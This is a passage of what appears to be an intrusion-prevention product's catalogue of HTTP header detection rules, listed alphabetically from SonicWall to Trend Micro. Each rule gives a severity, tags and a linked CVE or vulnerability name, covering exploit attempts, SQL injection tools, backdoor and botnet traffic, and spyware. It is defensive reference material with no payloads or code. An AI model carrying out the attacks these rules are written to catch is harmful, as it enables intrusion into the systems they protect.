About this situation: An attempt to exploit a vulnerability in SonicWall Analytics detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, SonicWall GMS, SonicWall Analytics, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1621-5242
Last changed: sgpkg-ips-1621-5242
Vulnerability: SonicWall-Gms-And-Analytics-Detectinjection-SQL-Injection
Description:
Back to top

HTTP_CSH-SonicWall-SSLVPN-Session-Hijacking-CVE-2024-53704

About this situation: An attempt to exploit a vulnerability in SonicWall SSLVPN detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, SonicWall SSL-VPN, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1838-5242
Vulnerability: SonicWall-SSLVPN-Session-Hijacking-CVE-2024-53704
Description:
Back to top

HTTP_CSH-Sony-PlayStation-3-Browser-Detected

About this situation: Sony Playstation 3 based browser detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-641-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Spotify-Usage

About this situation: Spotify usage detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-1794-5242
Last changed: sgpkg-ips-1794-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Spring-Cloud-Function-Spel-Code-Injection-CVE-2022-22963

About this situation: An attempt to exploit a vulnerability in Spring Cloud Function detected
Context: HTTP Request Header Line
Severity: 10
Tags: Any Operating System, Any Hardware, Spring Cloud Function, CVE2022, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1450-5242
Last changed: sgpkg-ips-1590-5242
Vulnerability: Spring-Cloud-Function-Spel-Code-Injection-CVE-2022-22963
Description:
Back to top

HTTP_CSH-SpyLocked-Application-Usage

About this situation: SpyLocked Application Usage
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, SpyLocked, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-111-2032
Last changed: sgpkg-ips-1638-5242
Vulnerability: SpyLocked-Application-Usage
Description:
Back to top

HTTP_CSH-Spyware-Webhancer

About this situation: Spyware WebHancer traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, WebHancer, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Spyware-Webhancer
Description:
Back to top

HTTP_CSH-SQL-Injection-Attack-Tool-Detected

About this situation: SQL-Injection Attack-Tool Detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-332-4219
Last changed: sgpkg-ips-1638-5242
Vulnerability: SQL-Injection-Attack-Tool
Description:
Back to top

HTTP_CSH-SQL-Injection-In-Referer-Header-Field

About this situation: SQL Injection in Referer Header Field
Context: HTTP Request Header Line
Severity: 10
Tags: Any Operating System, Any Hardware, CVE2007, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-344-4219
Last changed: sgpkg-ips-1588-5242
Vulnerability: Php-Nuke-Referer-SQL-Injection
Description:
Back to top

HTTP_CSH-SQL-Union-Select

About this situation: SQL commands detected in Referer header
Context: HTTP Request Header Line
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-447-4219
Last changed: sgpkg-ips-1400-5242
Vulnerability: SQL-Injection
Description:
Back to top

HTTP_CSH-Sqlmap-SQL-Injection-Tool-Usage

About this situation: Sqlmap SQL Injection tool usage detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Attack Related Anomalies, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-553-5211
Last changed: sgpkg-ips-553-5211
Vulnerability: Sqlmap-SQL-Injection-Tool
Description:
Back to top

HTTP_CSH-Squid-HTTP-Host-Header-Port-Handling-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Squid Project Squid detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-533-5211
Last changed: sgpkg-ips-1641-5242
Vulnerability: Squid-HTTP-Host-Header-Port-Handling-Denial-Of-Service
Description:
Back to top

HTTP_CSH-Squid-HTTP-Response-Processing-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Squid Project Squid detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-1528-5242
Vulnerability: Squid-HTTP-Response-Processing-Denial-Of-Service
Description:
Back to top

HTTP_CSH-Squid-Httpmakevarymark-Header-Value-DoS

About this situation: A Squid httpMakeVaryMark Header Value Denial of Service vulnerability
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1008-5242
Vulnerability: Squid-Httpmakevarymark-Header-Value-Denial-Of-Service
Description:
Back to top

HTTP_CSH-Squid-NTLM-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow in Squid NTLM authentication
Context: HTTP Request Header Line
Severity: 10
Tags: Linux, x86, Squid, CVE2004, Linux not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-510-5211
Vulnerability: Squid-Ntlm-BOF
Description:
Back to top

HTTP_CSH-Squid-Proxy-Cache-Cachemgr.cgi-Resource-Exhaustion

About this situation: An attempt to exploit a vulnerability in Squid Project Squid detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-1584-5242
Vulnerability: Squid-Proxy-Cache-Cachemgr.cgi-Resource-Exhaustion
Description:
Back to top

HTTP_CSH-Squid-Proxy-Digest-Nc-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Squid detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1671-5242
Last changed: sgpkg-ips-1671-5242
Vulnerability: Squid-Proxy-Digest-Nc-Heap-Buffer-Overflow
Description:
Back to top

HTTP_CSH-Squid-Proxy-HTTP-Header-Parser-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Squid Proxy detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2024, Any Operating System not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1708-5242
Last changed: sgpkg-ips-1708-5242
Vulnerability: Squid-Proxy-HTTP-Header-Parser-Denial-Of-Service
Description:
Back to top

HTTP_CSH-Squid-Proxy-HTTP-Message-Processing-Buffer-Overread

About this situation: An attempt to exploit a vulnerability in Squid Project Squid detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2023, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1692-5242
Last changed: sgpkg-ips-1692-5242
Vulnerability: Squid-Proxy-HTTP-Message-Processing-Buffer-Overread
Description:
Back to top

HTTP_CSH-Squid-Proxy-HTTP-X-Forwarded-For-Header-Handling-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Squid detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2023, Any Operating System not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1723-5242
Last changed: sgpkg-ips-1723-5242
Vulnerability: Squid-Proxy-HTTP-X-Forwarded-For-Header-Handling-Denial-Of-Service
Description:
Back to top

HTTP_CSH-Squid-Proxy-Range-Header-DoS

About this situation: An attempt to exploit a vulnerability in Squid Proxy Server detected.
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2021, Any Operating System not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1424-5242
Last changed: sgpkg-ips-1476-5242
Vulnerability: Squid-Proxy-Range-Header-DoS
Description:
Back to top

HTTP_CSH-Squid-Proxy-String-Processing-Null-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in Squid Project Squid detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-376-4219
Last changed: sgpkg-ips-376-4219
Vulnerability: Squid-Proxy-String-Processing-Null-Pointer-Dereference
Description:
Back to top

HTTP_CSH-Squid-Range-Header-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Squid Project Squid detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-604-5211
Last changed: sgpkg-ips-1476-5242
Vulnerability: Squid-Range-Header-Denial-Of-Service
Description:
Back to top

HTTP_CSH-Squid-Strhdracptlanggetitem-Value-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Squid Project Squid detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-1470-5242
Vulnerability: Squid-Strhdracptlanggetitem-Value-Denial-Of-Service
Description:
Back to top

HTTP_CSH-Srng

About this situation: SRNG traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, SRNG, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Srng
Description:
Back to top

HTTP_CSH-Stonesoft-SMC-Usage

About this situation: Stonesoft Management Server usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Stonesoft SMC, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Storm-Bot-Activity

About this situation: Storm bot activity detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Storm-Bot
Description:
Back to top

HTTP_CSH-Subversion-Usage

About this situation: Subversion usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Subversion, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-272-4219
Last changed: sgpkg-ips-1638-5242
Description:
Back to top

HTTP_CSH-Sun-Java-System-Web-Server-Digest-Authorization-Buffer-Overflow-2

About this situation: An attempt to exploit a vulnerability in Sun Microsystems Java System Web Proxy Server detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Sun Java Web Proxy Server, Sun Java Web Server, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-338-4219
Last changed: sgpkg-ips-506-5211
Vulnerability: Sun-Java-System-Web-Server-Digest-Authorization-Buffer-Overflow
Description:
Back to top

HTTP_CSH-Sun-Java-Update-Agent

About this situation: Sun Java update agent detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-214-2032
Last changed: sgpkg-ips-1638-5242
Description:
Back to top

HTTP_CSH-SunBurst-Backdoor-Traffic

About this situation: A traffic pattern associated with SunBurst Backdoor was detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Orion, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1306-5242
Last changed: sgpkg-ips-1641-5242
Vulnerability: Solarwinds-SunBurst-Traffic
Description:
Back to top

HTTP_CSH-Suspected-Cross-Site-Scripting-Attempt

About this situation: Detects script within header lines
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-477-5211
Last changed: sgpkg-ips-477-5211
Vulnerability: HTTP-Possible-Cross-Site-Scripting
Description:
Back to top

HTTP_CSH-Suspicious-Header

About this situation: A suspicious header name was detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-684-5211
Description:
Back to top

HTTP_CSH-Suspicious-If-Modified-Since-Header

About this situation: Invalid looking If-Modified-Since Header
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-341-4219
Last changed: sgpkg-ips-1275-5242
Description:
Back to top

HTTP_CSH-Suspicious-Non-Standard-Host-Header

About this situation: An non-standard HTTP Host header detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1852-5242
Description:
Back to top

HTTP_CSH-Suspicious-Range-Header

About this situation: A very large byte range
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1059-5242
Description:
Back to top

HTTP_CSH-Suspicious-Software-Download

About this situation: Suspicious software download detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Description:
Back to top

HTTP_CSH-Suspicious-User-Agent-WinHTTP-Loader

About this situation: Suspicious user-agent WinHTTP loader was detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1638-5242
Vulnerability: Suspicious-User-Agent-WinHTTP-Loader
Description:
Back to top

HTTP_CSH-Suspicious-WebDav-Request-To-Known-TCP-Tunneling-Services

About this situation: A suspicious WebDAV request detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Any Software, Windows not specific, Any Software not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1832-5242
Last changed: sgpkg-ips-1832-5242
Vulnerability: Suspicious-WebDav-Request-To-Known-TCP-Tunneling-Services
Description:
Back to top

HTTP_CSH-Swish-e-Web-Spider

About this situation: Swish-e web spider detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Swish-e, Any Operating System not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-260-3038
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Symantec-Messaging-Gateway-Save.do-Cross-Site-Request-Forgery

About this situation: A Symantec Messaging Gateway Save.do Cross Site Request Forgery vulnerability
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Messaging Gateway, CVE2012, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1008-5242
Vulnerability: Symantec-Messaging-Gateway-Save.do-Cross-Site-Request-Forgery
Description:
Back to top

HTTP_CSH-Symantec-Web-Gateway-OS-Command-Injection

About this situation: An attempt to exploit a vulnerability in Symantec Web Gateway detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Web Gateway, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-635-5211
Last changed: sgpkg-ips-1529-5242
Vulnerability: Symantec-Web-Gateway-OS-Command-Injection
Description:
Back to top

HTTP_CSH-System-File-Over-WebDAV

About this situation: A system file was transferred over WebDAV
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, MS2014-04, CVE2014, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-576-5211
Last changed: sgpkg-ips-1639-5242
Vulnerability: Microsoft-Windows-File-Handling-Component-Remote-Code-Execution
Description:
Back to top

HTTP_CSH-TBK-DVR4104-And-DVR4216-Authentication-Bypass-CVE-2018-9995

About this situation: An attempt to exploit a vulnerability in TBK DVR4104 and DVR4216 detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, TBK DVR, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1815-5242
Last changed: sgpkg-ips-1815-5242
Vulnerability: TBK-DVR4104-And-DVR4216-Authentication-Bypass-CVE-2018-9995
Description:
Back to top

HTTP_CSH-Tdss.c-Trojan-Traffic

About this situation: TDSS.C trojan traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Vulnerability: Tdss.c-Trojan
Description:
Back to top

HTTP_CSH-TeamViewer-DynGate-Request

About this situation: TeamViewer remote control software usage detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, TeamViewer, Any Operating System not specific, Remote Control, TCP Client Traffic
First detected in: sgpkg-ips-275-4219
Last changed: sgpkg-ips-275-4219
Vulnerability: TeamViewer-Usage
Description:
Back to top

HTTP_CSH-ThinkPHP-Local-File-Inclusion-CVE-2022-47945

About this situation: An attempt to exploit a vulnerability in ThinkPHP detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, ThinkPHP, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1774-5242
Last changed: sgpkg-ips-1774-5242
Vulnerability: ThinkPHP-Local-File-Inclusion-CVE-2022-47945
Description:
Back to top

HTTP_CSH-Tijcont.A-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Vulnerability: Win32.Downloader.Tijcont.A-Botnet
Description:
Back to top

HTTP_CSH-Tinyproxy-HTTP-Connection-Headers-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Tinyproxy detected
Context: HTTP Request Header Line
Severity: 7
Tags: Linux, Any Hardware, Tinyproxy, CVE2023, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1747-5242
Last changed: sgpkg-ips-1747-5242
Vulnerability: Tinyproxy-HTTP-Connection-Headers-Use-After-Free
Description:
Back to top

HTTP_CSH-Tinyproxy-HTTP-Connection-Headers-Use-After-Free-CVE-2023-49606

About this situation: An attempt to exploit a vulnerability in Tinyproxy detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Tinyproxy, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1724-5242
Last changed: sgpkg-ips-1724-5242
Vulnerability: Tinyproxy-HTTP-Connection-Headers-Use-After-Free-CVE-2023-49606
Description:
Back to top

HTTP_CSH-Tizen-Browser-Usage

About this situation: Tizen browser usage detected
Context: HTTP Request Header Line
Severity: 2
Tags: Tizen, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-1794-5242
Last changed: sgpkg-ips-1794-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Tofu-Backdoor-Request

About this situation: Traffic that resembles Tofu Backdoor communication detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-859-5242
Last changed: sgpkg-ips-859-5242
Vulnerability: Tofu-Backdoor
Description:
Back to top

HTTP_CSH-Traccar-Path-Traversal-CVE-2024-24809

About this situation: An attempt to exploit a vulnerability in Traccar
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Traccar, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1794-5242
Last changed: sgpkg-ips-1794-5242
Vulnerability: Traccar-Path-Traversal-CVE-2024-24809
Description:
Back to top

HTTP_CSH-Transfer-Encoding-Chunked

About this situation: Chunked transfer encoding detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Apache, CVE2002, Any Operating System not specific, Apache not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1645-5242
Vulnerability: HTTP-Apache-Chunked-Encoding-BOF
Description:
Back to top

HTTP_CSH-Transfer-Encoding-Compress

About this situation: Compress transfer encoding detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-528-5211
Last changed: sgpkg-ips-528-5211
Description:
Back to top

HTTP_CSH-Transfer-Encoding-Deflate

About this situation: Deflate transfer encoding detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-528-5211
Last changed: sgpkg-ips-528-5211
Description:
Back to top

HTTP_CSH-Transfer-Encoding-Gzip

About this situation: Gzip transfer encoding detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-528-5211
Last changed: sgpkg-ips-528-5211
Description:
Back to top

HTTP_CSH-Transfer-Encoding-Identity

About this situation: Identity transfer encoding detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-528-5211
Last changed: sgpkg-ips-528-5211
Description:
Back to top

HTTP_CSH-Transfer-Encoding-Invalid

About this situation: Invalid transfer encoding value
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Oracle BEA WebLogic, CVE2008, Any Operating System not specific, Anomalies, Protocol Violations, TCP Client Traffic
First detected in: sgpkg-ips-180-2032
Last changed: sgpkg-ips-529-5211
Vulnerability: HTTP-Oracle-Bea-WebLogic-Transfer-Encoding-BOF
Description:
Back to top

HTTP_CSH-Transfer-Encoding-Overflow

About this situation: Oversized Transfer-Encoding
Context: HTTP Request Header Line
Severity: 10
Tags: Any Operating System, Any Hardware, Oracle BEA WebLogic, CVE2008, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-180-2032
Last changed: sgpkg-ips-180-2032
Vulnerability: HTTP-Oracle-Bea-WebLogic-Transfer-Encoding-BOF
Description:
Back to top

HTTP_CSH-Transmission-P2P-Client

About this situation: Transmission P2P Client Detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, BitTorrent, Any Operating System not specific, BitTorrent not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-318-4219
Last changed: sgpkg-ips-1638-5242
Vulnerability: BitTorrent-Peer-To-Peer-Network-Usage
Description:
Back to top

HTTP_CSH-Transponder

About this situation: Transponder plugin activity detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Transponder, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-33-1210
Last changed: sgpkg-ips-1638-5242
Vulnerability: ABetterInternet
Description:
Back to top

HTTP_CSH-Trend-Micro-Control-Manager-Chunked-Encoding-Buffer-Overflow

About this situation: Detects Trend Micro Control Manager chunked encoding buffer overflow exploits
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, x86, Trend Micro Control Manager, CVE2005, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-63-1210
Last changed: sgpkg-ips-513-5211
Vulnerability: HTTP-Trend-Micro-Control-Manager-Chunked-Encoding-Buffer-Overflow
Description:
Back to top

HTTP_CSH-Trend-Micro-Endpoint-Application-Control-Filedrop-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Trend Micro Endpoint Application Control detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Endpoint Application Control, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1071-5242
Last changed: sgpkg-ips-1071-5242
Vulnerability: Trend-Micro-Endpoint-Application-Control-Filedrop-Directory-Traversal
Description:
Back to top

HTTP_CSH-Trend-Micro-Threat-Discovery-Appliance-Remote-Command-Execution

